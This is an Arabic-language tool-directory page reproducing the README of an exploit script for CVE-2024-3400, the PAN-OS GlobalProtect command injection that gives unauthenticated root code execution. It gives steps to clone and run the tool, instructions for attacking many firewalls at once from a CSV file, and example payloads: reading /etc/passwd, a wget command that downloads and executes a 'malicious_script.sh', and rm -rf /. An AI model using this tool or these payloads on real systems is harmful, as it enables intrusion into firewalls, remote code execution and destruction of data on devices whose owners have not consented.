Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/yuvvi01/cve-2024-3400
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

استغلال سكريبت لثغرة CVE-2024-3400، وهي حقن أوامر في PAN-OS GlobalProtect، مما يسمح بتنفيذ كود عن بُعد غير مصادق عليه بصلاحيات الجذر. يدعم الاستغلال لهدف واحد وأهداف متعددة قائمة على ملفات CSV.

عرض المستودع
1151منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

سكربت استغلال جدار حماية PAN-OS

تم تصميم هذا السكربت لتوضيح استغلال الثغرات في جدران حماية PAN-OS. يرسل حمولة مُصممة خصيصًا إلى نقطة نهاية API لجدار الحماية لتنفيذ أوامر عشوائية. يستهدف هذا الاستغلال تحديدًا CVE-2024-3400، وهي ثغرة حقن أوامر في ميزة GlobalProtect في برنامج Palo Alto Networks PAN-OS لإصدارات محددة من PAN-OS. قد تمكّن تكوينات ميزات معينة مهاجمًا غير مصادَق من تنفيذ كود عشوائي بصلاحيات الجذر على جدار الحماية.

ملاحظة: يرجى التأكد من أنك تستخدم هذا السكربت فقط لأغراض قانونية وأخلاقية، وفقط على الأجهزة التي لديك إذن باختبارها.

الاستخدام

لاستخدام هذا المشروع، اتبع الخطوات التالية:

  1. استنسخ هذا المستودع:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. انتقل إلى مجلد المستودع:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. ثبّت الوحدات المطلوبة:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. شغّل سكربت بايثون.
    root@kitploit:~
    python3 exploit.py
    

اتبع التعليمات لإدخال عنوان IP لجدار حماية PAN-OS القابل للاستغلال والحمولة المراد تنفيذها.

أمثلة على الحمولات

  1. اعرض محتويات الدليل:
    root@kitploit:~
    ls -la
    
    
  2. اطبع محتويات ملف معين:
    root@kitploit:~
    cat /etc/passwd
    
    
  3. اطبع اسم المستخدم الحالي المسجل دخوله إلى النظام:
    root@kitploit:~
    whoami
    
    
  4. نزّل ملفًا من الإنترنت (يتطلب تثبيت wget أو curl):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  5. كن حذرًا جدًا مع هذا الأمر:
    root@kitploit:~
    rm -rf /
    

تعليمات الاستخدام الآمن

التحقق من شهادة SSL

سيطلب السكربت مسار ملف شهادة SSL من خادم جدار الحماية PAN-OS. إذا لم يتم تقديم مسار، سيضبط السكربت تلقائيًا التحقق من SSL إلى false، مما يعطل SSL فعليًا.

تعليمات ملف CSV

يتيح لك هذا السكربت استغلال أهداف متعددة من جدران حماية PAN-OS القابلة للاستغلال باستخدام ملف CSV. فيما يلي تعليمات تنسيق ملف CSV بشكل صحيح:

تنسيق ملف CSV:

يجب أن يحتوي ملف CSV على ثلاثة أعمدة:

  • ipaddress: عنوان IP لجدار حماية PAN-OS القابل للاستغلال.

  • payload: الحمولة المراد تنفيذها على جدار الحماية.

  • path/to/root_CA_certificate.pem: مسار شهادة CA الجذرية (اتركه فارغًا إذا كان التحقق من الشهادة معطلًا).

  • مثال على ملف CSV:

    root@kitploit:~
    ipaddress,payload,path/to/root_CA_certificate.pem
    192.168.1.1,exploit_payload1,/path/to/certificate.pem
    192.168.1.2,exploit_payload2,
    

التعليمات:

  • أنشئ ملف CSV بالتنسيق المحدد.
  • املأ عناوين IP والحمولات ومسارات شهادات CA الجذرية (إن وجدت).
  • تأكد من تقديم مسارات صالحة لشهادات CA الجذرية أو اترك الحقل فارغًا إذا كان التحقق من الشهادة معطلًا.
  • شغّل السكربت واختر خيار استخدام ملف CSV عندما يُطلب منك ذلك.

المراجع

  • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
  • https://security.paloaltonetworks.com/CVE-2024-3400
تنزيل الأداة